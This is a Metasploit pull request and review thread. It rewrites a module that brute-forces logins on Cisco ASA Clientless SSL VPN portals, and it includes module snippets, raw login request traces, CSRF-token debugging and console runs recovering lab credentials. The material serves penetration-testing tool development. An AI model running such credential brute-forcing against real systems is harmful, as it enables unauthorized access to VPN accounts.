### PR TITLE
Rewrite of Cisco ASA Clientless VPN Brute-force

### PR DESCRIPTION
**Pull request by jbaines-r7**
This pull request fixes issues with `modules/auxiliary/scanner/http/cisco_asa_asdm.rb`. Specifically, the module was never really brute forcing the Cisco ASA ASDM interface. The old module targeted login attempts to `/+webvpn+/index.html` which is part of the Clientless SSL VPN (webvpn) interface.

There is *potentially* overlap of accounts between ASDM and webvpn, but it isn't a requirement. The interfaces can source their user accounts from independent sources or restrict accounts to only work on one or the other. Furthermore, there are ASDM-specific credentials that will never work on the webvpn (e.g. logging in using the `enable` password). And, finally, the two interfaces are not required to be listening on the same interface or even enabled at the same time. For example, if enabled, webvpn is typically expected to be listening on `outside`, while a good deployment of ASDM will be on `management` (with a strict IP filtering list).

As part of my current workload I've been doing a good deal of ASDM work and I've written an ASDM brute-force module (pull request tbd). But I felt I needed to shore this one up as well... and move it out of the way. Especially since the webvpn is still quite popular (~185k hits on [Shodan](https://www.shodan.io/search?query=%22Set-Cookie%3A+webvpn_portal%22)). So I've `git mv` the webvpn brute force module to a more appropriate location, modernized it, updated it to handle word lists, updated it to work with connection profiles, created documentation, and tested it against the latest (I believe?) ASA software version (9.18.1).

## Verification

Please talk to me about acquiring an ASAv. Then follow the documentation instructions to configure ASAv, Clientless SSL VPN, and add a user for testing.

- [ ] Add the user to `data/wordlists/http_default_userpass.txt` (e.g. `user1 user1`)
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/cisco_asa_clientless_vpn`
- [ ]  `set RHOST <ip>`
- [ ]  `set VERBOSE false`
- [ ] `run`
- [ ] Verify the configured user was discovered during the brute force attack.

## PoC Video || GTFO

https://www.youtube.com/watch?v=3Zy3WhoSfNA

### CODE REVIEW

File: documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md [hunk 1]
```diff
@@ -0,0 +1,190 @@
...
+1. Click `Add`
+1. Keep the default username (`user1`)
+1. Enter and confirm a password (e.g. `user1`)
+1. Set the privilege level to 0 (I'm not sure this step is actually required but)
+1. Select the `No ASDM, SSH, Telnet, or Console access` radio
+1. Hit `OK`
+1. Hit `Apply`
+
+
+You should now be able to log in to the SSL VPN web portal using `user1`:`user1`.
```
Comment (cdelafuente-r7) [inline documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md:102]: I received this error message when trying to log in to the SSL VPN portal: "AnyConnect is not enabled on the VPN server". I had to do this to make it work:
1. Go to `Configuration -> Device Management -> Users/AAA -> Dynamic Access Policies`
1. Select the `DfltAccessPolicy` and click `Edit`
1. Select `Access Method` tab
1. Click on the `Web-Portal` radio button

I'm not sure if it is the right thing to do, but without it, I could not log in to the Web SSL VPN portal.

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @jbaines-r7 for this PR and the great documentation! I successfully installed ASAv 9.18.1 and log in to the SSL VPN web portal using the user I created. However, it looks like the module is not able to login with the same credentials.

Here is the output with `HttpTrace`:
```
msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run RHOSTS=192.168.144.200 verbose=true PASS_FILE="" USER_FILE="" USERPASS_FILE="" USERNAME=user1 PASSWORD=myuser12 HttpTrace=true

####################
# Request:
####################
GET /+CSCOE+/logon.html HTTP/1.1
Host: 192.168.144.200
User-Agent: Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1


####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-store
Pragma: no-cache
Connection: Keep-Alive
Date: Tue, 19 Jul 2022 23:31:30 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; frame-ancestors 'self'; base-uri 'self'; block-all-mixed-content
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpn_as=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, samlPreauthSessionHash=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, acSamlv2Token=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, acSamlv2Error=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpnlogin=1; path=/; secure, webvpnLang=en; path=/; secure


<!DOCTYPE html>
<html style="height:100%;width:100%;">
<head>

<title>SSL VPN Service</title>
<meta name="HandheldFriendly" content="
[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
[*] Starting login brute force...
[*] 192.168.144.200:443 - [1/1] - Trying username:"user1" with password:"myuser12"
####################
# Request:
####################
POST /+webvpn+/index.html HTTP/1.1
Host: 192.168.144.200
User-Agent: Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1
Cookie: webvpnlogin=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

tgroup=&next=&tgcookieset=&username=user1&password=myuser12&Login=Login
####################
# Response:
####################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob:; frame-ancestors 'self'; base-uri 'self'; block-all-mixed-content
X-Frame-Options: SAMEORIGIN
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Cache-Control: no-store
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpn_as=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure, webvpnlogin=1; secure

<html>
<head>
<script>
document.location.replace("/+CSCOE+/logon.html?"+
"a0=115"+
"&a1="+
"&a2="+
"&a3=1");
</script>
</head>
</html>



[-] 192.168.144.200:443 - [1/1] - FAILED LOGIN - "user1":"myuser12"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I compared this with the web portal connection HTTP requests/responses and found out the POST login request needs to include a CSRF token (`csrf_token`), which should come from the main logon page.

Also, I left a couple of minor comments for you to review, when you got a chance.

File: documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md (hunk 1 above)
Comment (jbaines-r7) [reply documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md:102]: This shouldn't have been a required step. I wrote this install guide as I was doing it :shrug:  Let me see what the side affects are though.

**Comment by jbaines-r7** [comment]
> I compared this with the web portal connection HTTP requests/responses and found out the POST login request needs to include a CSRF token (`csrf_token`), which should come from the main logon page.

@cdelafuente-r7, I'm not seeing this at all tbh. `logon.html` has no CSRF logic embedded (that I can see). And this screenshot shows a normal post with no CSRF in the parameters.

request

And, of course, my original pull contains a video demonstrating the brute force working. So... can you provide additional details? Like any type of proof that a csrf token is needed would be useful.

File: documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md (hunk 1 above)
Comment (jbaines-r7) [reply documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md:102]: For what it's worth, this didn't appear to change anything for me, but my configuration didn't need it in the first place.

**Comment by cdelafuente-r7** [comment]
@jbaines-r7 , sure! Here are both requests (`GET /+CSCOE+/logon.html` and `POST /+webvpn+/index.html`) with the CSRF token highlighted.
Screenshot 2022-08-16 at 16 56 55
Screenshot 2022-08-16 at 16 57 19

**Comment by jbaines-r7** [comment]
My target doesn't have the code.

Screen Shot 2022-08-16 at 11 09 52 AM

What ASAv version did you install?

**Comment by cdelafuente-r7** [comment]
This might be a difference in the configuration. I've found there is a setting called `HTTP Non-Browser Client Support` and it looks like it disables CSRF token for clients listed in there:
https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asdm78/general/asdm-78-general-config/intro-intro.html#reference_fjy_pmz_fhb

**Comment by cdelafuente-r7** [comment]
I installed ASAv 9.18.1

File: documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md (hunk 1 above)
Comment (jbaines-r7) [reply documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md:102]: I did a re-install using 9.18.2 and also encountered this 😱 Adding this into the docs as the fix.

File: modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.rb [hunk 2]
```diff
@@ -0,0 +1,141 @@
...
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')
+        ])
+      ]
+    )
+  end
+
+  def run_host(_ip)
+    # Establish the remote host is running the clientless vpn
+    res = send_request_cgi('uri' => normalize_uri('/+CSCOE+/logon.html'))
+    return unless res && res.code == 200 && res.get_cookies.include?('webvpn')
```
[the remark this answers is not in the document]
Comment (jbaines-r7) [reply modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.rb:65]: Done!

**Comment by jbaines-r7** [comment]
Okay, I was able to get the CSRF token version working as well. I did end up touching `lib/rex/proto/http/client.rb` because the client wasn't handling the server's HTTP response `Connection: Keep-Alive` properly (e.g. the client was killing the connection after receiving one packet). Normally, I'd avoid touching any `proto` code like the plague, but the server wouldn't respect the client's `HTTP 1.0` or `Connection: close` values. So I didn't have much choice... but it appears that there was an `XXX` in `client.rb` for my exact situation 🤷 However, I wasn't brave enough to run `rubycop` on `client.rb`, so that might have some fall out. 😆 

Either way! I have two ASA targets. One without CSRF tokens (10.9.49.201) and one with (10.9.49.204) and everything works now:

```
msf6 > use auxiliary/scanner/http/cisco_asa_clientless_vpn 
msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run RHOSTS=10.9.49.204 verbose=true PASS_FILE="" USER_FILE="" USERPASS_FILE="" USERNAME=cisco PASSWORD=labpass1

[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
[*] Starting login brute force...
[*] 10.9.49.204:443 - [1/1] - Trying username:"cisco" with password:"labpass1"
[+] SUCCESSFUL LOGIN - "cisco":"labpass1"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run RHOSTS=10.9.49.201 verbose=true PASS_FILE="" USER_FILE="" USERPASS_FILE="" USERNAME=cisco PASSWORD=labpass1

[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
[*] Starting login brute force...
[*] 10.9.49.201:443 - [1/1] - Trying username:"cisco" with password:"labpass1"
[+] SUCCESSFUL LOGIN - "cisco":"labpass1"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

File: lib/rex/proto/http/client.rb [hunk 3]
```diff
@@ -600,8 +600,8 @@ def read_response(t = -1, opts = {})
           rblob = rbody.to_s + rbufq.to_s
           tries = 0
           begin
-            # XXX: This doesn't deal with chunked encoding or "Content-type: text/html; charset=..."
-            while tries < 1000 and resp.headers["Content-Type"]== "text/html" and rblob !~ /<\/html>/i
+            # XXX: This doesn't deal with chunked encoding
+            while tries < 1000 and resp.headers["Content-Type"] and resp.headers["Content-Type"].starts_with?('text/html') and rblob !~ /<\/html>/i
```
Comment (bwatters-r7) [inline lib/rex/proto/http/client.rb:604]: Normally, I'm squishy on changing core lib code, but this looks fine.  (Famous last words)  The code is 12 years old and looks to be designed to handle an edge case.  It appears functionally equivalent for the previous instances, and I'm curious how often this loop has to run in most cases?

**Comment by cdelafuente-r7** [comment]
Thanks @jbaines-r7 for updating this. Everything looks good to me now. I tested against ASAv 9.18.1 and verified the valid credentials were correctly reported. I'll go ahead and land it.

- Example output
```
msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run RHOSTS=192.168.200.102 verbose=false USERNAME=user1 PASSWORD=myuser12

[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
[*] Starting login brute force...
[+] SUCCESSFUL LOGIN - "user1":"myuser12"
[+] SUCCESSFUL LOGIN - "cisco":"security"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > creds
Credentials
===========

host             origin           service                              public  private   realm  private_type  JtR Format
----             ------           -------                              ------  -------   -----  ------------  ----------
192.168.200.102  192.168.200.102  443/tcp (Cisco ASA SSL VPN Service)  user1   myuser12         Password
192.168.200.102  192.168.200.102  443/tcp (Cisco ASA SSL VPN Service)  cisco   security         Password
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This improves the original `auxiliary/scanner/http/cisco_asa_asdm` scanner module by adding the ability to brute force the Cisco ASA's Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and `auxiliary/scanner/http/cisco_asa_asdm_bruteforce`, which provide brute force of the Cisco ASA's ASDM interface directly.

**Pull request merged**